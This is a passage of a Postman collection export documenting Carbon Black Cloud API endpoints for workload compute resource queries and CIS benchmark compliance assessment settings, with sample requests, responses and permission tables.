}\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/lcm/view/v2/orgs/{{cb_org_key}}/compute_resources/_facet"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 01 Sep 2023 13:29:31 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"111"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Tracer-Id","value":"9eeced9c2425bc92effff9a8d22336f1"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"terms\": [\n        {\n            \"field\": \"cloud_provider_tags\",\n            \"values\": []\n        },\n        {\n            \"field\": \"auto_scaling_group_name\",\n            \"values\": []\n        },\n        {\n            \"field\": \"virtual_private_cloud_id\",\n            \"values\": []\n        },\n        {\n            \"field\": \"platform_details\",\n            \"values\": []\n        },\n        {\n            \"field\": \"platform\",\n            \"values\": []\n        }\n    ]\n}"}],"_postman_id":"83b4115a-085b-4231-b840-8d026b2c3083"},{"name":"Get AWS Compute Resource Summary","id":"e63941b6-b0ad-4d24-b283-e198b9026637","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"deployment_type\": [\n            \"AWS\"\n        ],\n        \"auto_scaling_group_name\": [\n            \"AutoScalingGroup\"\n        ],\n        \"availability_zone\": [\n            \"us-west-1c\"\n        ],\n        \"cloud_provider_account_id\": [\n            \"1234567890\"\n        ],\n        \"virtual_private_cloud_id\": [\n            \"vpc-id\"\n        ]\n    },\n    \"summary_fields\": [\n        \"availability_zone\",\n        \"region\",\n        \"subnet_id\",\n        \"virtual_private_cloud_id\",\n        \"security_group_id\"\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/lcm/view/v2/orgs/{{cb_org_key}}/compute_resources/_summarize","description":"<h3 id=\"get-aws-compute-resource-summary\">Get AWS Compute Resource Summary</h3>\n<p>Get AWS compute resource summary on required fields.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>public.cloud.inventory</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"query\": \"&lt;string&gt;\",\n  \"criteria\": {\n    \"deployment_type\": [\"&lt;string&gt;\"],\n    \"auto_scaling_group_name\": [\"&lt;string&gt;\"],\n    \"availability_zone\": [\"&lt;string&gt;\"],\n    \"cloud_provider_account_id\": [\"&lt;string&gt;\"],\n    \"cloud_provider_resource_id\": [\"&lt;string&gt;\"],\n    \"cloud_provider_tags\": [\"&lt;string&gt;\"],\n    \"id\": [\"&lt;string&gt;\"],\n    \"installation_status\": [\"&lt;string&gt;\"],\n    \"name\": [\"&lt;string&gt;\"],\n    \"platform\": [\"&lt;string&gt;\"],\n    \"platform_details\": [\"&lt;string&gt;\"],\n    \"region\": [\"&lt;string&gt;\"],\n    \"subnet_id\": [\"&lt;string&gt;\"],\n    \"virtual_private_cloud_id\": [\"&lt;string&gt;\"],\n  },\n  \"exclusions\": {\n    \"deployment_type\": [\"&lt;string&gt;\"],\n    \"auto_scaling_group_name\": [\"&lt;string&gt;\"],\n    \"availability_zone\": [\"&lt;string&gt;\"],\n    \"cloud_provider_account_id\": [\"&lt;string&gt;\"],\n    \"cloud_provider_resource_id\": [\"&lt;string&gt;\"],\n    \"cloud_provider_tags\": [\"&lt;string&gt;\"],\n    \"id\": [\"&lt;string&gt;\"],\n    \"installation_status\": [\"&lt;string&gt;\"],\n    \"name\": [\"&lt;string&gt;\"],\n    \"platform\": [\"&lt;string&gt;\"],\n    \"platform_details\": [\"&lt;string&gt;\"],\n    \"region\": [\"&lt;string&gt;\"],\n    \"subnet_id\": [\"&lt;string&gt;\"],\n    \"virtual_private_cloud_id\": [\"&lt;string&gt;\"],\n  },\n  \"summary_fields\": [ \"&lt;string&gt;\" ]\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vm-workload-search/#get-aws-compute-resource-summary\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["lcm","view","v2","orgs","{{cb_org_key}}","compute_resources","_summarize"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"aad91370-a8f2-4dfc-9fc6-0371808164c9","name":"Get AWS Compute Resource Summary","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"deployment_type\": [\n            \"AWS\"\n        ],\n        \"auto_scaling_group_name\": [\n            \"AutoScalingGroup\"\n        ],\n        \"availability_zone\": [\n            \"us-west-1c\"\n        ],\n        \"cloud_provider_account_id\": [\n            \"1234567890\"\n        ],\n        \"virtual_private_cloud_id\": [\n            \"vpc-id\"\n        ]\n    },\n    \"summary_fields\": [\n        \"availability_zone\",\n        \"region\",\n        \"subnet_id\",\n        \"virtual_private_cloud_id\",\n        \"security_group_id\"\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/lcm/view/v2/orgs/{{cb_org_key}}/compute_resources/_summarize"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 01 Sep 2023 13:29:49 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"108"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Tracer-Id","value":"435f7134103338b7793dc189e89fd8c2"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"summaries\": [\n        {\n            \"field\": \"availability_zone\",\n            \"count\": 0\n        },\n        {\n            \"field\": \"security_group_id\",\n            \"count\": 0\n        },\n        {\n            \"field\": \"subnet_id\",\n            \"count\": 0\n        },\n        {\n            \"field\": \"region\",\n            \"count\": 0\n        },\n        {\n            \"field\": \"virtual_private_cloud_id\",\n            \"count\": 0\n        }\n    ]\n}"}],"_postman_id":"e63941b6-b0ad-4d24-b283-e198b9026637"},{"name":"Get Compute Resource by ID","id":"7b58cb73-0a8f-4817-8a77-0d0a2a11e0c9","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/lcm/view/v2/orgs/{{cb_org_key}}/compute_resources/{{cb_resource_id}}?deployment_type={{cb_deployment_type}}","description":"<h3 id=\"get-compute-resource-by-id\">Get Compute Resource by ID</h3>\n<p>Get the compute resource by ID from your organization. Based on the deployment type either AWS or Workload permissions are needed.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.vcenter.vm</td>\n<td>READ</td>\n</tr>\n<tr>\n<td>public.cloud.inventory</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vm-workload-search#get-compute-resource-by-id\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["lcm","view","v2","orgs","{{cb_org_key}}","compute_resources","{{cb_resource_id}}"],"host":["{{cb_url}}"],"query":[{"key":"deployment_type","value":"{{cb_deployment_type}}"}],"variable":[]}},"response":[{"id":"3564442e-6371-4a84-982e-ad833d72fb88","name":"Get Compute Resource by ID","originalRequest":{"method":"GET","header":[],"url":{"raw":"{{cb_url}}/lcm/view/v2/orgs/{{cb_org_key}}/compute_resources/{{cb_resource_id}}?deployment_type={{cb_deployment_type}}","host":["{{cb_url}}"],"path":["lcm","view","v2","orgs","{{cb_org_key}}","compute_resources","{{cb_resource_id}}"],"query":[{"key":"deployment_type","value":"{{cb_deployment_type}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 01 Sep 2023 13:31:21 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"561"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Tracer-Id","value":"af284a98b7fff09167d7257bcc119f8a"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"deployment_type\": \"WORKLOAD\",\n    \"id\": \"1111111\",\n    \"name\": \"enwin2016ards\",\n    \"org_key\": \"ABCD1234\",\n    \"create_time\": \"2023-06-13T10:46:03.742Z\",\n    \"appliance_uuid\": \"2f91a74c-240a-4455-9b66-27064944e116\",\n    \"cluster_name\": \"cls\",\n    \"datacenter_name\": \"DC\",\n    \"esx_host_name\": \"10.186.16.142\",\n    \"esx_host_uuid\": \"42012506-fe63-1d3c-6b00-c55a11bdc911\",\n    \"vcenter_name\": \"VMware vCenter Server 7.0.1 build-16858589\",\n    \"vcenter_host_url\": \"sc2-10-186-31-103.eng.vmware.com\",\n    \"vcenter_uuid\": \"d91bff81-01ff-4e27-930f-663654839811\",\n    \"host_name\": \"enwin2016ards.enauto.com\",\n    \"created_at\": \"2023-06-13T10:46:03.742Z\",\n    \"ip_address\": \"1.1.1.1\",\n    \"eligibility\": \"NOT_ELIGIBLE\",\n    \"eligibility_code\": [\n        \"VMware Tools update required\"\n    ],\n    \"installation_status\": \"NOT_INSTALLED\",\n    \"installation_status_code\": null,\n    \"uuid\": \"503ae427-7d9b-0ab0-ebdd-cea50fb53f11\",\n    \"os_description\": \"Microsoft Windows Server 2016 or later (64-bit)\",\n    \"os_type\": \"WINDOWS\",\n    \"os_architecture\": \"64\",\n    \"vmwaretools_version\": \"10341\"\n}"}],"_postman_id":"7b58cb73-0a8f-4817-8a77-0d0a2a11e0c9"}],"id":"336226d8-b91f-4bd2-a5b5-8c0f3da07eda","description":"<h2 id=\"overview\">Overview</h2>\n<p>This API lets Carbon Black Cloud Workload users visualize a materialized view from inventory and lcm services.</p>\n<h3 id=\"requirements\">Requirements</h3>\n<ul>\n<li>Carbon Black Cloud Workload - You must have purchased one of the Carbon Black Cloud Workload packages.<br />  Minimum sensor versions: Version: 3.8 (Windows) &amp; 2.13 (Linux). Check they’re the correct sensor version.</li>\n<li>All API calls require an API key with appropriate permissions see <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vm-workload-search/#authentication\">Authentication</a></li>\n</ul>\n","_postman_id":"336226d8-b91f-4bd2-a5b5-8c0f3da07eda","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"CIS Benchmarks API","item":[{"name":"Settings","item":[{"name":"Get Organization Settings for Compliance Assessment","id":"a296b1ee-b6bf-4369-bf39-23c5d05b864c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/settings","description":"<p>Get the current schedule for Compliance Assessment scans.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","settings"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"cecb14c1-10e3-4eaa-88ed-23582f34fe1d","name":"Get Organization Settings for Compliance Assessment","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/settings"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"scan_schedule\": \"FREQ=WEEKLY;BYDAY=FR;BYHOUR=23;BYMINUTE=30;BYSECOND=0\",\n    \"scan_timezone\": \"UTC\"\n}"}],"_postman_id":"a296b1ee-b6bf-4369-bf39-23c5d05b864c"},{"name":"Update Organization Settings for Compliance Assessment","id":"f60635ea-2ab5-4106-a118-d7a4a65086f4","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\n    \"scan_schedule\": \"FREQ=WEEKLY;BYDAY=FR;BYHOUR=23;BYMINUTE=30;BYSECOND=0\",\n    \"scan_timezone\": \"UTC\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/settings","description":"<p>Apply a new schedule for Compliance Assessment scans.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"scan_schedule\": \"\",\n  \"scan_timezone\": \"\"\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/compliance-assessment/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","settings"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"9578193a-b585-4350-8566-633add8b88ae","name":"Update Organization Settings for Compliance Assessment","originalRequest":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\n    \"scan_schedule\": \"FREQ=WEEKLY;BYDAY=TH;BYHOUR=23;BYMINUTE=30;BYSECOND=0\",\n    \"scan_timezone\": \"UTC\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/settings"},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"scan_schedule\": \"FREQ=WEEKLY;BYDAY=TH;BYHOUR=23;BYMINUTE=30;BYSECOND=0\",\n    \"scan_timezone\": \"UTC\"\n}"}],"_postman_id":"f60635ea-2ab5-4106-a118-d7a4a65086f4"}],"id":"0e394eb7-1112-4a4e-b6d2-09041a0b5f33","description":"<p>Manage the schedule for running Compliance Assessment scans.</p>\n","_postman_id":"0e394eb7-1112-4a4e-b6d2-09041a0b5f33","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Benchmark Configuration","item":[{"name":"Search Benchmark Sets","id":"ff04091c-3211-4223-b61c-7273ed742e53","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"Test\",\n    \"criteria\": {\n        \"benchmark_set_id\": [\n            \"{{cb_benchmark_set_id}}\"\n        ]\n    },\n    \"rows\": 20,\n    \"start\": 0,\n    \"sort\": [\n        {\n            \"field\": \"create_time\",\n            \"order\": \"ASC\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/_search","description":"<p>Use the search query and criteria to return the required Benchmark SetRBAC Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"query\": \"&lt;string&gt;\",\n  \"rows\": \"&lt;integer&gt;\",\n  \"start\": \"&lt;integer&gt;\",\n  \"criteria\": {\n      \"&lt;fieldname&gt;\": [\n          \"&lt;string&gt;\"\n      ]},\n    \"sort\": [\n        {\n        \"field\": \"&lt;string&gt;\",\n        \"order\": \"&lt;string&gt;\"\n        }\n    ]\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/compliance-assessment/#search-benchmark-sets\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","benchmark_sets","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"e98a7b72-ce25-40fd-b485-ad924a421b9a","name":"Search Benchmark Sets","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"windows\",\n    \"rows\": 20,\n    \"start\": 0,\n    \"criteria\": {\n        \"os_type\": [\n            \"WINDOWS\"\n        ]\n    },\n    \"exclusions\": {\n        \"cis_version\": [\n            \"1.4.0\"\n        ]\n    },\n    \"sort\": [\n        {\n            \"field\": \"lastAssessed\",\n            \"order\": \"DESC\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/_search"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": \"1\",\n    \"results\": [\n    {\n        \"id\": \"251cc749-47d5-420d-9465-00a35a7024aa\",\n        \"name\": \"Sample Benchmark Set\",\n        \"version\": \"1.0.0.1\",\n        \"os_family\": \"WINDOWS_SERVER\",\n        \"enabled\": false,\n        \"type\": \"Custom\",\n        \"supported_os_info\": [\n            {\n                \"os_metadata_id\": \"1\",\n                \"os_type\": \"WINDOWS\",\n                \"os_name\": \"Windows Server 2012 x64\",\n                \"cis_version\": \"2.3.0\"\n            }\n        ],\n        \"created_by\": \"Jane Doe\",\n        \"updated_by\": \"jane@company.com\",\n        \"create_time\": \"2023-03-01T03:07:14.383765Z\",\n        \"update_time\": \"2023-03-01T03:07:14.383765Z\",\n        \"sections\": [\n        {\n            \"id\": \"57428517-7E67-27DE-4EA7-699AFF2EDC61\",\n            \"name\": \"Local Policies\",\n            \"description\": \"This section contains recommendations for local policies.\",\n            \"sections\": [\n                {\n                    \"id\": \"BE5B0852-96F7-3E07-391F-B1FA8CFF7F21\",\n                    \"name\": \"User Rights Assignment\",\n                    \"description\": \"This section contains recommendations for user rights assignments.\",\n                    \"sections\": [],\n                    \"rules\": [\n                        {\n                            \"id\": \"BCCAAACA-F0BE-4C0F-BE0A-A09FC1641EE2\",\n                            \"rule_name\": \"(L1) Ensure 'Create a pagefile' is set to 'Administrators'\",\n                            \"enabled\": false,\n                            \"section_id\": \"BE5B0852-96F7-3E07-391F-B1FA8CFF7F21\",\n                            \"section_name\": \"User Rights Assignment\"\n                        }\n                    ]\n                }]\n        }]\n    }]\n}"}],"_postman_id":"ff04091c-3211-4223-b61c-7273ed742e53"},{"name":"Update Benchmark Set","id":"15cc65be-bbaf-491f-aaba-da851a11d6ac","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\n    \"enabled\": false,\n    \"update_time\": \"2023-04-05T23:55:04.684577Z\",\n    \"name\": \"Demonstration Set Update\",\n    \"created_by\": \"anonymous\",\n    \"create_time\": \"2023-04-05T23:55:04.684577Z\",\n    \"version\": \"1.0.0.4\",\n    \"supported_os_info\": [\n        {\n            \"os_metadata_id\": \"1\",\n            \"os_type\": \"WINDOWS\",\n            \"os_name\": \"Windows Server 2012 x64\",\n            \"cis_version\": \"2.3.0\"\n        },\n        {\n            \"os_metadata_id\": \"2\",\n            \"os_type\": \"WINDOWS\",\n            \"os_name\": \"Windows Server 2012 R2 x64\",\n            \"cis_version\": \"2.5.0\"\n        }\n    ],\n    \"type\": \"Custom\",\n    \"id\": \"251cc749-47d5-420d-9465-00a35a7024aa\",\n    \"updated_by\": null,\n    \"os_family\": \"WINDOWS_SERVER\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}","description":"<p>Update a benchmark set</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-body\">Request Body</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"id\": \"&lt;string&gt;\",\n    \"name\": \"&lt;string&gt;\",\n    \"version\": \"&lt;string&gt;\",\n    \"os_family\": \"&lt;string&gt;\",\n    \"enabled\": &lt;boolean&gt;,\n    \"type\": \"&lt;string&gt;\",\n    \"supported_os_info\": [\n        {\n            \"os_metadata_id\": \"&lt;string&gt;\",\n            \"os_type\": \"&lt;string&gt;\",\n            \"os_name\": \"&lt;string&gt;\",\n            \"cis_version\": \"&lt;string&gt;\",\n        }\n    ],\n    \"created_by\": \"&lt;string&gt;\",\n    \"updated_by\": \"&lt;string&gt;\",\n    \"create_time\": \"&lt;string&gt;\",\n    \"update_time\": \"&lt;string&gt;\"\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/compliance-assessment/#update-benchmark-set-rules\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","benchmark_sets","{{cb_benchmark_set_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"15cc65be-bbaf-491f-aaba-da851a11d6ac"},{"name":"Clone a Benchmark Set","id":"3a927b03-a061-46f9-b9c4-434fe8f16719","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"benchmark_name\":\"Name of new Benchmark Set\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/_clone","description":"<p>Make a complete copy of a Benchmark set.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>READ, CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-body\">Request Body</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"benchmark_name\":\"&lt;string&gt;\"\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/vm-workload-search/#fetch-compute-resource-by-id\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","benchmark_sets","{{cb_benchmark_set_id}}","_clone"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"ef324c80-4b8a-4335-bf11-3a35b96d75c0","name":"Clone a Benchmark Set","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"benchmark_name\": \"Copy of Sample Benchmark Set\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/_clone"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"1b9cc3ad-9d34-468c-8d68-0ec150d142d3\"\n}"}],"_postman_id":"3a927b03-a061-46f9-b9c4-434fe8f16719"},{"name":"Delete Benchmark Set","id":"57fb68fc-72a4-4567-ab40-ffa5146678c6","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}","description":"<p>Delete the specified Benchmark Set</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/compliance-assessment/#delete-benchmark-set\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud 